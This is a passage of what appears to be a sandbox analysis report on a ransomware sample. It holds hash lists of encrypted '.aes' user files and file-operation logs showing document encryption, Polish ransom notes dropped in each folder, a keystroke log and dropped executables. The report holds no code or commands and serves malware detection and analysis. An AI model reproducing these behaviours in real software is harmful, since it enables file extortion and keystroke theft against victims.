SHA1: 7939f071be3f45b27bd129873892cbe634911507 SHA256: a4a84a386be06865ee264f976d92993f63b59076a90c9b8bb5f86ea9a9bc42dd |
|
|
| c:\users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\hj3hcknndjhrdyob.bmp.aes | 86.63 KB (88706 bytes) |
MD5:
d704b39e96ace1e9680656ecc41ba45c
SHA1: ed0559ea0ee77ea6a11d7bd466085f921d74b3d1 SHA256: 352a7435112d013eee8f672dc51b6042087dab02bfd2522be179c51104c7c512 |
|
|
| c:\users\kft6utqw\pictures\e8b06t5z\vgej4z4hhmv\iq814t.jpg.aes | 55.66 KB (56994 bytes) |
MD5:
b075ff6bcc1398b5012471b78fe73559
SHA1: 20d5e36608da2ec3333231e2662be9581753973d SHA256: 931f7fd054716f5dc4ef982b0cb2ef25b19354e62d65a242a53644e276eade1f |
|
|
| c:\users\kft6utqw\pictures\e8b06t5z\s-t1dx_aj3.bmp.aes | 48.36 KB (49522 bytes) |
MD5:
cd66f4db85d6d442cfab2a5c809d6044
SHA1: 36053b4cef0181f908d0bce466550e901a9dd24d SHA256: 7b7aaf9809e222428f8dce0044952ba34016038dbf9f5399ea487c3bdf5f4670 |
|
|
| c:\users\kft6utqw\pictures\4nz6fd 37umclhfq6.gif.aes | 41.53 KB (42530 bytes) |
MD5:
7c7eddf376e72dd9ffe833b6678e7845
SHA1: 0c72a25c7efdf2dca4cdccd965380006c103114b SHA256: 05f5a0b53b2c6143cb23b752152bace25bc73317202c06a52a7681489967ea0d |
|
|
| c:\users\kft6utqw\pictures\dxfmoruezqji.bmp.aes | 12.31 KB (12610 bytes) |
MD5:
eda7d48889d003792454783691b40d1e
SHA1: e263f59d1fe5f672071b040873641d4bcd52e6b2 SHA256: d5384697261e5ea0ae0b08fa7e970b39a231607e77a8f5fe002106bc4d7b6d7a |
|
|
| c:\users\kft6utqw\pictures\ijyzg07wazvwa6fxqh0.gif.aes | 61.77 KB (63250 bytes) |
MD5:
87b30b0b15565d24c76735a4018820ef
SHA1: 50a55e8c82808d505cf6c2d1a5ae9dd21dd9343c SHA256: 43ec2359847c04335e7efe7e1a5c4bca7850fa10ad10c1e4bb7164b39e2b00da |
|
|
| c:\users\kft6utqw\pictures\np za.bmp.aes | 40.83 KB (41810 bytes) |
MD5:
ed068736adf9db8ee6657e4efbc5aa23
SHA1: 5210287477ea6dcffb0be3cd3eac2810b4e6562f SHA256: 4439fa657ed7847b2334dec7e1c792dc47e201ea13474fee9104dbe188330b25 |
|
|
| c:\users\kft6utqw\pictures\oypzzx.jpg.aes | 19.28 KB (19746 bytes) |
MD5:
18b383bfe85a0e38654727b470238b93
SHA1: edd8c503377dc0a4fff674ac97bf438de3955c90 SHA256: 60731910cc92087ac13346df70511c935cb9987efcc22e3c9fcc72c65370a0e6 |
|
|
| c:\users\kft6utqw\music\e1mt woaqipijv7ecvn\ogal6nmv2cy0e3 6\cqqmpg-jbive.wav.aes | 12.60 KB (12898 bytes) |
MD5:
2efecc5e09a806518caaaa451330e6d5
SHA1: d97403ff308b4ad8ba1b978147e1504614cfa88e SHA256: c38f03bbbe51b548218be617dd167dc2575ce063bc4b27ab166894b0d4c94129 |
|
|
| c:\users\kft6utqw\music\e1mt woaqipijv7ecvn\ogal6nmv2cy0e3 6\eh1oc xshc.wav.aes | 5.89 KB (6034 bytes) |
MD5:
94c84b999e958e384632ddda2c11db87
SHA1: 1cf64f860701da8e0d216300573966e7055447b2 SHA256: 02b95f691723532fb8fedb43d457012dfa65f00b97514c65fc63ce7925387784 |
|
|
| c:\users\kft6utqw\music\e1mt woaqipijv7ecvn\ogal6nmv2cy0e3 6\jmrfgsolm2gk_qf.wav.aes | 4.56 KB (4674 bytes) |
MD5:
972060ec2b90cc088faf2d3c9733b404
SHA1: 8660c10575b687b3f467e6945403fb864910d454 SHA256: 9a05ac5dc9ea31f97c46888f4d8385637ad3fc9aefc0f98c3585e555da3f39ba |
|
|
| c:\users\kft6utqw\music\e1mt woaqipijv7ecvn\ogal6nmv2cy0e3 6\mtd6xqw0jrc8h.wav.aes | 49.00 KB (50178 bytes) |
MD5:
79d31eb4c4c563d24f1231953abee005
SHA1: 59c4b937a3f6dc01605767b2e7e958f56bd64937 SHA256: 96aaa4cb45be0f173c54350bc5fa719095a2430f9068239821cc11f17e11c478 |
|
|
| c:\users\kft6utqw\music\e1mt woaqipijv7ecvn\spkpdtjk\clnojurnmvl\d xgp5yxo\zxoge.wav.aes | 99.22 KB (101602 bytes) |
MD5:
41e75f67da25ed6018e480c4a003b804
SHA1: c341245f06e806417ce4cb14d9630c66689058ee SHA256: 35fbf8a4a72082edc4decf7569ef131538217631f81ff381ba03dca2d2daf28a |
|
|
| c:\users\kft6utqw\music\e1mt woaqipijv7ecvn\spkpdtjk\clnojurnmvl\b95u.wav.aes | 70.56 KB (72258 bytes) |
MD5:
375a9e6c894010cba93ad55981c3fd67
SHA1: 398a5cac8fa575f8230ce2ea3e6f7fb8088606af SHA256: 7aa20a99de140edc4aaa49a3cf052fe3adafd442872060d97a2fcbb595bc4cd0 |
|
|
| c:\users\kft6utqw\music\e1mt woaqipijv7ecvn\spkpdtjk\clnojurnmvl\m9qfpaq6hssl8whb.wav.aes | 88.72 KB (90850 bytes) |
MD5:
93bbc1027ecb8600c30338a0bd6bb267
SHA1: 7afa897ee034ace147a6209cab4c25849b2b76a1 SHA256: 2e2b399a6cb1a24ac8b79ab42acb7eb97bcf64b62d5616d15fc65f7542f5be0c |
|
|
| c:\users\kft6utqw\music\e1mt woaqipijv7ecvn\spkpdtjk\clnojurnmvl\mmtrdlygm.wav.aes | 48.22 KB (49378 bytes) |
MD5:
ff6a626834c39acd8b578140989dd65c
SHA1: 5152e4b8edaa66f4a95f01f34fd86c044a92fd12 SHA256: 60107d665f32d86edcdbe66b2323390fab3c5d50ba12dbec8aee5817dc0df7c7 |
|
|
| c:\users\kft6utqw\music\e1mt woaqipijv7ecvn\spkpdtjk\clnojurnmvl\om rimvmjxnxzplia-.wav.aes | 77.50 KB (79362 bytes) |
MD5:
72d78ded59ae878ea4bf66aaf78ae1ac
SHA1: 23e7b55c913b17a10f66cfb8df3c89775e0a093a SHA256: 30a39fb8026cb096391441ff073213851d2141a98847ba7e56665c42e40e2564 |
|
|
| c:\users\kft6utqw\music\e1mt woaqipijv7ecvn\spkpdtjk\bdvgdqlhd8y.wav.aes | 89.27 KB (91410 bytes) |
MD5:
cc4291ec28c66d69c59c06c6aba3675d
SHA1: 4b8c771ca03fdd214a9018cbf682ef90bd8c4021 SHA256: eb0157558b237bc62b6fe486e84127279df47897ddfe6b484c94e1fdfcc21e65 |
|
|
| c:\users\kft6utqw\music\e1mt woaqipijv7ecvn\spkpdtjk\ldkh5kxqmk43.wav.aes | 91.25 KB (93442 bytes) |
MD5:
bdd540c16de9535056c5acae807106f3
SHA1: 4f6184f38ebe65124388686046e341af605cf85f SHA256: 7a0747a2d9c308cbf5d25572254a213c1dd94e8c4da6612fe3451e92cdbcf3d6 |
|
|
| c:\users\kft6utqw\music\e1mt woaqipijv7ecvn\bpwdqbd367v5jcwf.wav.aes | 14.88 KB (15234 bytes) |
MD5:
004d812c19245dee58e0966f07c82683
SHA1: 3a623a42aea5506b6b4ed66deec1c8e37b3dc388 SHA256: ff15aef5260061fd34a206741226ca440858a0ca77e6cac95029c9113d236ca5 |
|
|
| c:\users\kft6utqw\music\e1mt woaqipijv7ecvn\lbtiev6ysxhhxcjq.wav.aes | 78.64 KB (80530 bytes) |
MD5:
ef56213a2a03b2ca546d2ef53b0a62be
SHA1: 588d88ed499093351870ac786c1819561d98b2fa SHA256: d4e4eaacb58db4e60522f8bea5059da6c1819ce6dd752f7a7230231cbeaf91fe |
|
|
| c:\users\kft6utqw\music\giud.wav.aes | 68.14 KB (69778 bytes) |
MD5:
d2c9aa40567cf701ab262bf9de7b274b
SHA1: 1f66c9eaeb6805c77bb7d9fede3d0596a0e189b7 SHA256: 972fd9ff136dd087ff14080fa536b8c7d0d1cd57e07d853b0d7823e9033c8d34 |
|
|
| c:\users\kft6utqw\music\qnsmqvcmaaiuq5u.wav.aes | 54.35 KB (55650 bytes) |
MD5:
47dbedc3579d6becea21d1ffa85c2601
SHA1: d9748dbd27a38e79df1cea8c7e28045605e6d811 SHA256: bffbcaf6dc814d8f52b19633d932741a8e614208b9a062822212d570bb635372 |
|
|
| c:\users\kft6utqw\videos\extoa\5rxjc 2tw9i2cmhdlv\eyqf5ksecamn6njljm\y3m6chihdf_yy2sbaze.avi.aes | 89.22 KB (91362 bytes) |
MD5:
8cb41d5769de0ef8ed58a0591665a0fb
SHA1: f766e8b3d61ee15682596a452ea6fdaf2e993572 SHA256: c17714f62ca6507b7140d1a149d0ed4de6ab22e83568e8de097cc68ecaa02d24 |
|
|
| c:\users\kft6utqw\videos\extoa\5rxjc 2tw9i2cmhdlv\lnvggurmvcvr5ekcq-4\ejvttmxbiz6sbbuew.swf.aes | 42.38 KB (43394 bytes) |
MD5:
35cf8461c521d8b60e72db3289ebe26e
SHA1: 3e0753ed78b934c999f2da4359201367e3079bec SHA256: 6d30d89a3ea636f513a26e417e04ac83b1a2c70bf33b8713cba90238aec240e2 |
|
|
| c:\users\kft6utqw\videos\extoa\5rxjc 2tw9i2cmhdlv\lnvggurmvcvr5ekcq-4\xstc7qezlhs _ste0b.avi.aes | 7.47 KB (7650 bytes) |
MD5:
415d10e3d9a949f0a80cfbacaea7f908
SHA1: 820c14506371195fa958c06d6c56f29107e5a7a5 SHA256: 5d2e2c703a5a3c3f29bf8c8727f9ba356145bd8a1ffd860a65e99fc727bd7edb |
|
|
| c:\users\kft6utqw\videos\extoa\5rxjc 2tw9i2cmhdlv\wqhnocgb21accc\4m2t-htfvxv73.swf.aes | 56.42 KB (57778 bytes) |
MD5:
51e33bc6bca3efb60b4dea404216463f
SHA1: 96338c13c8dd8f19f5e9c90f8752ac85225511b6 SHA256: 62698be77f2cbafe68adfe06dba77037ee05869b8b818affd83fd24e377a510a |
|
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\kft6utqw\appdata\local\gdipfontcachev1.dat | 106.29 KB (108840 bytes) |
MD5:
0ca6e490d14a6ce88ae3ddae37e3ab68
SHA1: 51e8a1f6b02afd748aaba11f90b32b17922ec606 SHA256: 09efbda7b1f894cd9276b52bd0b51d7c25c4b674e6d7b219c77e5e5f48a83846 |
|
|
| c:\users\kft6utqw\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015 | 0.33 KB (342 bytes) |
MD5:
056ff6888e1cabab306bbc8d70e30f26
SHA1: 0c19c8c7f125b9aa77efcd96b0205bf9c73f81c9 SHA256: ed4857269890bb5f05f8a00e242a9371ae9cc922e6a98ae0d3ba6f4959a90d4e |
|
|
| c:\users\kft6utqw\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015 | 0.33 KB (342 bytes) |
MD5:
7c07d3bcec4525e80ecc89da3e6a0ba5
SHA1: a2ee4711a3a66aad3e90487887f5be36e7440897 SHA256: d35eab7249d4c08aa44fa7c082d96db01e55490600b3426eb4588057e1c561d6 |
|
|
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | 8856F961-340A-11D0-A96B-00C04FD705A2 | 00000000-0000-0000-C000-000000000046 | cls_context = CLSCTX_INPROC_SERVER |
|
1 |
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\kFT6uTQW\AppData\Roaming\nvss.exe | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Keyboard\17102017_012722.log | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Keyboard\17102017_012722.log | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Keyboard\17102017_012722.log | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Keyboard\17102017_012722.log | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\nVO-4P-KzZ-c6DO0e\1BUS.odt | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\nVO-4P-KzZ-c6DO0e\1BUS.odt.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\nVO-4P-KzZ-c6DO0e\#$# JAK-ODZYSKAC-PLIKI.txt | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\nVO-4P-KzZ-c6DO0e\b-s_mvDIaHRjA WonYD7.csv | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\nVO-4P-KzZ-c6DO0e\b-s_mvDIaHRjA WonYD7.csv.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\3fRpiUpvJo9PXh.doc | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\3fRpiUpvJo9PXh.doc.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\#$# JAK-ODZYSKAC-PLIKI.txt | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\7wlDZE9WQQHKod.odp | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\7wlDZE9WQQHKod.odp.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\hvCemxS1iSlcK.doc | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\hvCemxS1iSlcK.doc.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\pA730znoL5.rtf | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\pA730znoL5.rtf.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\_X864G9NgHeHTp16YW.ods | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\HKRkjnzp\_X864G9NgHeHTp16YW.ods.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\P9grc6N9ugQ9v\0qp cbTp2kDuTxPhn8y.csv | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\P9grc6N9ugQ9v\0qp cbTp2kDuTxPhn8y.csv.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\P9grc6N9ugQ9v\#$# JAK-ODZYSKAC-PLIKI.txt | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\P9grc6N9ugQ9v\F6P3h-e5k60SlJ.pdf | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\P9grc6N9ugQ9v\F6P3h-e5k60SlJ.pdf.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\P9grc6N9ugQ9v\iUfdaFezBB3P- l4I3e.rtf | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\P9grc6N9ugQ9v\iUfdaFezBB3P- l4I3e.rtf.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\P9grc6N9ugQ9v\pWQHqSJInPvfKbJkRZb.rtf | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\P9grc6N9ugQ9v\pWQHqSJInPvfKbJkRZb.rtf.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\P9grc6N9ugQ9v\t8rijBa3r5rIl.pptx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\P9grc6N9ugQ9v\t8rijBa3r5rIl.pptx.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\0_b3IJRL61ikm2.xls | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\0_b3IJRL61ikm2.xls.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\#$# JAK-ODZYSKAC-PLIKI.txt | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\568WxqKDq_FIMwoN.pdf | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\568WxqKDq_FIMwoN.pdf.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\8m1FCp.ots | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\8m1FCp.ots.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\p2QHvHrC07x 6M.odt | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\p2QHvHrC07x 6M.odt.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\URm66b8mfK_B.docx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\URm66b8mfK_B.docx.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\vfwuhDCvzF0GRto.pptx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\vfwuhDCvzF0GRto.pptx.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\wVF JPe1b.xls | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\OXq6TNDno0\wVF JPe1b.xls.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\qa6QFkq\n1mKD81VKeIa7S2.rtf | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\qa6QFkq\n1mKD81VKeIa7S2.rtf.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\qa6QFkq\#$# JAK-ODZYSKAC-PLIKI.txt | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\qa6QFkq\ORRmspMNhOgtvaB.doc | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\qa6QFkq\ORRmspMNhOgtvaB.doc.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\AppData\Roaminghhfhqi2h.wln.bat | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\qa6QFkq\PP5 bxjS.pptx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\qa6QFkq\PP5 bxjS.pptx.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\qa6QFkq\xlyLS6yx0MIco1.pps | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\qa6QFkq\xlyLS6yx0MIco1.pps.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\-GJqEDw.odt | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\-GJqEDw.odt.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\#$# JAK-ODZYSKAC-PLIKI.txt | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\8pUhJoF5OUB0zF3kJ4pk.ods | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\8pUhJoF5OUB0zF3kJ4pk.ods.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\eQOV.odp | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\eQOV.odp.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\SzJbmK.odt | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\SzJbmK.odt.aes | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL |
|
1 | |
| Create | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\TWIwOWOOuJkW1 zw.xlsx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
